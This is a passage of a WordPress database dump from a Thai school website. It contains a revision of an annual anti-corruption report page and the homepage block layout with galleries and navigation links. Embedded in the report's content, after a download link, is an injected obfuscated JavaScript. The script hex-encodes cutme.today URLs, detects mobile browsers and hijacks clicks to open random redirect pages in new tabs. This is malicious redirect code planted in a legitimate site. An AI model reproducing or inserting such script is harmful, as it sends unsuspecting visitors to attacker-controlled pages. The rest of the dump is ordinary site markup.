aria-describedby=\"wp-block-file--media-f4be8a42-d6b4-4952-b680-5b1f499ece36\">Download</a></div>\n<!-- /wp:file -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี','','inherit','closed','closed','','1020-revision-v1','','','2024-08-21 09:33:13','2024-08-21 02:33:13','',1020,'http://pakhaeng.ssk.in.th/?p=1023',0,'revision','',0),
(1024,1,'2024-08-21 09:33:34','2024-08-21 02:33:34','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_1540af-66\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[666,668],\"type\":\"carousel\",\"imageRatio\":\"land169\",\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":666,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=666\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"width\":1600,\"height\":900},{\"id\":668,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=668\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_95f155-a6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_95f155-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":758,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-2.png\" alt=\"\" class=\"wp-image-758\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div 